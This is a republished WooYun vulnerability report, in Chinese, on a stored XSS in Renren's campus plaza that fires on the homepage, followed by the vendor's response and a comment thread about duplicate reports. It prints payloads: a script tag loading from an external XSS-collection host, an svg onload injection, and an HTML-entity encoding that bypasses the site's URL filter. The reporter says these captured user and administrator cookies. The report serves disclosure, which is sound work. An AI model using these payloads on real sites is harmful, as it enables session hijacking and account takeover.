人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

admin 2015年8月13日00:35:50评论329 views字数 225阅读0分45秒阅读模式
摘要

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2014-83600

漏洞标题: 人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

相关厂商: 人人网

漏洞作者: g0odnight

提交时间: 2014-11-17 16:59

公开时间: 2015-01-01 17:00

漏洞类型: XSS 跨站脚本攻击

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 持久型xss

1人收藏


漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

话说前段时间给你们说过这个校园广场上的这个点有漏洞,你们去补了。然后我今天看了下,恩,粗看的确补了。但是感觉不对啊。详细看下面吧

详细说明:

通过人人app提交如下代码先来APP提交页面截图:

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

看代码:

code 区域
<script src=http://xss.name/CsWX0p></script>会被过滤成这样:<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
原来压根不过滤。看着好像没问题,但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤,用这个代码:<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的,直接首页弹了,影响所有访问首页的用户,不需要点击帖子什么的。

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

就这样,弹了。

然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是:首先把=号后面的标记出来,然后对有http://头的一段内容进行分割,提取出来扔到title标签里。技术员肯定觉得这样难以绕过,能绕过也会很费力。但是你忘了重新编码,src=支持多种编码哦~那就编码试试~

code 区域
为了防止泄露个人隐私,这个链接只是举例我随机删了几个字符,望包涵。
<script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

管理员的

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

就这样了。快去补吧

漏洞证明:

看代码:

code 区域
<script src=http://xss.name/CsWX0p></script>会被过滤成这样:<script src="alert(te)" <a="" href="http://rrurl.cn/myAuj6" target="_blank" title="http://xss.name/ceHQoI">http://rrurl.cn/myAuj6 </a> "></script>
原来压根不过滤。看着好像没问题,但是感觉哪里不对。先试下弹窗回头试试绕过url的过滤,用这个代码:<img src=1><svg/onload=prompt(1)>直接弹了。先看图。这是首页的,直接首页弹了,影响所有访问首页的用户,不需要点击帖子什么的。

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

就这样,弹了。

然后来试试url的绕过。人人技术员对上一次漏洞的处理方法是:首先把=号后面的标记出来,然后对有http://头的一段内容进行分割,提取出来扔到title标签里。技术员肯定觉得这样难以绕过,能绕过也会很费力。但是你忘了重新编码,src=支持多种编码哦~那就编码试试~

code 区域
为了防止泄露个人隐私,这个链接只是举例我随机删了几个字符,望包涵。
<script src=http://XXX.XXX/CsWX0p></script>对这里的链接重新编码下~比如&#104;&116;&#112;&#58&#47;&#120;&#115;&#115;&#46;&#110;&#97&#101;&#47;&#67;&#115;&#87。然后提交~

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

成功了~然后看下cookie。收到一个用户cookie。然后来个管理员的

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

管理员的

人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie

修复方案:

过滤策略加强,你们更专业~

版权声明:转载请注明来源 g0odnight@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-11-17 17:03

厂商回复:

前面有白帽子提过,重复了,还是谢谢。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-11-17 17:04 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    前面也是我提交的,麻烦你看看清楚!你们漏洞补了,然后我又绕过了!

  2. 2014-11-17 17:05 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    同一个提交点,漏洞补了再被绕过,就不算漏洞了?

  3. 2014-11-17 17:17 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @疯狗 这算厂商无视白帽子劳动成果嘛。我还真以为有谁也提交了,看了下没有啊。最近几个都是我提交的。他们补了漏洞,然后又被我挖出来就不算漏洞了么?

  4. 2014-11-17 17:30 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @人人网 麻烦看下,和之前我发的。我把之前发的全设成非匿名了。你们补掉的漏洞,没补好。又被绕过。请详细看下。我已经直接联系人人网校园广场的负责人。你们既然负责接收这里的漏洞通报,就请负责。

  5. 2014-11-17 17:46 | xiao.k ( 普通白帽子 | Rank:157 漏洞数:16 | 纳威网络安全导航 navisec.it)

    1

    唉~漏洞狗啊。。。帮厂商提交漏洞还需要求爷爷告奶奶的。这是什么世道。

  6. 2014-11-17 18:00 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    1

    哈哈,漏洞狗这个词精辟,跪舔厂商修复漏洞。

  7. 2014-11-17 18:10 | 人人网(乌云厂商)

    1

    @g0odnight 这算那门子绕过啊?我上周发了邮件催业务补,人家根本没补,我今天早上还又发了邮件催别人补...我真的很好奇你哪里看出来是补了被你绕过了?

  8. 2014-11-17 18:36 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @人人网 我之前第一次提交的时候就已经和人人校园广场的负责人说了,然后他直接让技术去补了。我在这次的提交里也标出了上次补漏洞后采用的过滤方法。第一次提交的时候是完全没有过滤。如果需要我和校园广场负责人的聊天记录截图,可以私信我。

  9. 2014-11-17 18:40 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @人人网 算了。不想跪舔了。就这样吧。第一次是完全没过滤,这次是加了一定的策略没起作用。反正后面出了事也不关我事。

  10. 2014-11-17 18:44 | 人人网(乌云厂商)

    1

    @g0odnight 他修复了也没找过安全中心确认过,至少今天早上我还重复发了邮件提醒这个业务没修复。既然你能和校园广场的负责人沟通,为什么不直接提醒他没修复到位呢?

  11. 2014-11-17 18:52 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @人人网 已经提醒了,就不能来这里提交报告嘛==、

  12. 2014-11-17 20:04 | 人人网(乌云厂商)

    1

    @g0odnight 我们也给rank不是吗?

  13. 2014-11-17 20:06 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @人人网 恩。我一开始以为你们知道广场那个业务的技术把漏洞补上了,然后把两个漏洞当成一个了。原来你们也不知道。搞误会了。

  14. 2014-11-17 20:07 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @g0odnight 。。。能打管理cookie,能进去不。。。

  15. 2014-11-17 20:41 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @px1624 上一次提交漏洞的时候测试进去了。这次因为和上次漏洞同一个点,就没测。进去了一个什么安全运营系统。

  16. 2014-11-17 20:50 | BMa 人人网校园广场存在持久型xss漏洞影响首页还能打管理cookie ( 核心白帽子 | Rank:2078 漏洞数:218 )

    1

    @g0odnight 那就闹大发点

  17. 2014-11-17 20:54 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @BMa 算了不闹了。怪我私下里把漏洞给人人的一个负责人让他去通知补漏洞了。导致人人两个部门没协调好,一个补好了漏洞,另一个以为没补。下次只提交不通知了。

  18. 2014-11-17 20:59 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 我回头提交个给力的,重点功能很隐蔽的一枚储存XSS,求给力,求20rank!

  19. 2014-11-17 21:05 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:13 | 么么哒,呵呵哒,么蛤蛤~)

    1

    @px1624 写全一点。感觉现在少写一些不重要的步骤也会被扣好多分,有小流程。到时候求围观

  20. 2014-11-17 22:39 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 @g0odnight 。。。不能这么说吧。比如人人网的xss,你如果只弹个窗,那有毛用啊,你盲打到后台管理,如果没证明可以登入,或者其他危害,那还是没啥用啊!既然没啥用,肯定不会给你高分或者大厂商流程了。

  21. 2014-11-19 09:28 | 人人网(乌云厂商)

    1

    @g0odnight 晕,库带上提交这个漏洞也是你吧?以后不要在一洞多投了,本来就违反乌云和库带的原则

  22. 2014-11-19 10:23 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @g0odnight @人人网 哈哈,不厚道啊。。、

  23. 2014-11-19 11:16 | 人人网(乌云厂商)

    1

    @px1624 一个洞都要被你撸出血了

  24. 2014-11-19 11:37 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @人人网 。。。有么有忍忍vip,来一发啊,快到期了

  25. 2015-01-06 14:58 | popok ( 普通白帽子 | Rank:117 漏洞数:21 | nothing)

    1

    @人人网 @px1624 一个洞都要被你撸出血了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin